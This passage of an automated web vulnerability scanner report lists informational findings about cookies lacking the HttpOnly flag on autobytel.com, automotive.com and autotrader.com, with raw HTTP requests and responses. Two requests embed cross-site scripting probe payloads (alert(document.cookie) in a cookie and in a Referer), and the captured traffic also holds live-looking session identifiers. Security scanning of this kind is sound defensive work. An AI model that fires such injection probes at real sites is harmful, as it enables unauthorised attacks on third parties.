Host:	http://www.autobytel.com
Path:	/content/buy/finance/index.cfm/action/Calculator

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:28:34 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.628. http://www.autobytel.com/content/buy/warranty/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:42 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.629. http://www.autobytel.com/content/home/help/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.630. http://www.autobytel.com/content/home/help/index.cfm/action/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.631. http://www.autobytel.com/content/home/help/index.cfm/action/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.632. http://www.autobytel.com/content/home/help/index.cfm/action/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.633. http://www.autobytel.com/content/home/help/index.cfm/action/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/terms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.634. http://www.autobytel.com/content/home/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ID=4%3BABTL;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/index.cfm?id=4;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

14.635. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.636. http://www.autobytel.com/content/research/article/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.637. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.638. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.639. http://www.autobytel.com/content/research/comparison/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/comparison/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.640. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.641. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.642. http://www.autobytel.com/content/shared/modProfile/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/shared/modProfile/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ID=4%3BABTL;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: ?Email_Addr_vch=&Postal_Code_vch=&FirstName=&LastName=&DefaultInList=&EmailAddressError=6&PostalCodeError=3&LoginError=0&WasError=1
Server: Microsoft-IIS/7.0
Content-Length: 138
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:14 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:14 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:41:14 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/

<html>
<head>
<title>Signup</title>
<link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>

14.643. http://www.autobytel.com/new-car-price-quotes.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:00 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.644. http://www.autobytel.com/new-cars.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-cars.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:24 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.645. http://www.autobytel.com/used-cars.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:33 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.646. http://www.autobytel.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cweb=JONQJVS10.4.128.184CKMMK; path=/
USER_UUID_VCH=37AC631C%2DE9D5%2DFD37%2DEDAF61EB5BA1725D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
TIME=%7Bts%20%272011%2D01%2D24%2008%3A03%3A09%27%7D;path=/
TIME=%7Bts%20%272011%2D01%2D24%2012%3A04%3A09%27%7D;expires=Wed, 16-Jan-2041 16:04:09 GMT;path=/
ID=4%3BABTL;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.647. http://www.automotive.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.automotive.com
Path:	/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UserPuid=2325714041713319967; domain=automotive.com; expires=Mon, 24-Jan-2061 16:04:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /x22 HTTP/1.1
Host: www.automotive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.648. http://www.autotrader.com/ajax/backButtonFix.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/ajax/backButtonFix.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/backButtonFix.jsp HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:16:18 GMT
Server: Apache
Content-Length: 34
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: BIGipServerAT-Production_hhtp=3526518282.61475.0000; path=/

/fyc/index.jsp?bkms=1295964978669

14.649. http://www.autotrader.com/cms/img/homepage/autoMercado_logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/cms/img/homepage/autoMercado_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerwww=1619582986.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cms/img/homepage/autoMercado_logo.gif HTTP/1.1
Host: www.autotrader.com
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:19:41 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 20:38:55 GMT
Accept-Ranges: bytes
Content-Length: 2439
Cache-Control: max-age=604800
Expires: Tue, 01 Feb 2011 02:19:41 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Set-Cookie: BIGipServerwww=1619582986.61475.0000; path=/

GIF89a..................TX`.'1.....................................................&.!*.").$-.AH.......................}....!..#..$..$..%..&..&..(..'..(..). *.!,.!+.#..",.#-.%..$..%/.&0.&0.'0.(2.)3.*
...[SNIP]...

14.650. http://www.autotrader.com/fyc/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/fyc/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=3476186634.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:56:02 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3476186634.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.651. http://www.autotrader.com/fyc/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/fyc/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=89BF6C3250E2E334; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885067966444; path=/; expires=Sat, 03-Jan-15 16:04:27 GMT; domain=.autotrader.com
BIGipServerwww=1351147530.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fyc/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.652. http://www.autotrader.com/hornav/trader/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=3778176522.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:56:08 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3778176522.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.653. http://www.autotrader.com/hornav/trader/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/hornav/trader/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=5789AE528FD93066; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885068472993; path=/; expires=Sat, 03-Jan-15 16:04:28 GMT; domain=.autotrader.com
BIGipServerwww=1552474122.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hornav/trader/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.654. http://www.autotrader.com/inc/ad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/inc/ad.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=3140642314.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /inc/ad.html HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:15:53 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 12:42:24 GMT
Accept-Ranges: bytes
Content-Length: 1999
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=604800
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3140642314.61475.0000; path=/

<html>
<head>
<script src="http://ads.autotrader.com/DE/DartRichMedia_1_03.js" type="text/javascript"></script>
<script src="http://ads.autotrader.com/DE/flash8.js" type="text/javascript"></sc
...[SNIP]...

14.655. http://www.autotrader.com/no_cache/ac/trader_clicks_0001_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0001_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=7569AE0D6B39E1B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767490185; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
BIGipServerwww=1737023498.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.656. http://www.autotrader.com/no_cache/ac/trader_clicks_0002_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0002_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=BF3F7217996B123A; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767492259; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
BIGipServerwww=1317593098.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.657. http://www.autotrader.com/no_cache/ac/trader_clicks_0005_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0005_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=1AA3D7F874709C04; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767486770; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
BIGipServerwww=1653137418.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.658. http://www.autotrader.com/no_cache/ac/trader_clicks_0006_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0006_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=4BE5B3481EBAD751; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767492827; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
BIGipServerwww=2022236170.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.659. http://www.autotrader.com/no_cache/ac/trader_clicks_0009_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0009_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=DE05B78BAE6BA143; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767489238; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
BIGipServerwww=2575884298.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.660. http://www.autotrader.com/no_cache/ac/trader_clicks_0016_nocount.asis previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/no_cache/ac/trader_clicks_0016_nocount.asis

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=F295814A75AF51AA; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295884767489157; path=/; expires=Sat, 03-Jan-15 15:59:27 GMT; domain=.autotrader.com
BIGipServerwww=1250484234.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.661. http://www.autotrader.com/research/certified-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/certified-cars/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=49F204915327FA62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885065453031; path=/; expires=Sat, 03-Jan-15 16:04:25 GMT; domain=.autotrader.com
BIGipServerwww=1787355146.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.662. http://www.autotrader.com/research/certified-cars/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/certified-cars/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=3056756234.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/certified-cars/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:24 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3056756234.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

14.663. http://www.autotrader.com/research/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/index.jsp/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=2D8D8CB669EE0E07; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
ATC_ID=173.193.214.243.1295885066866955; path=/; expires=Sat, 03-Jan-15 16:04:26 GMT; domain=.autotrader.com
BIGipServerwww=1971904522.61475.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.664. http://www.autotrader.com/research/index.jsp/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/research/index.jsp/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAT-Production_hhtp=3442632202.61475.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /research/index.jsp/x22 HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1317593098.61475.0000;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 23:55:39 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerAT-Production_hhtp=3442632202.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>

...[SNIP]...

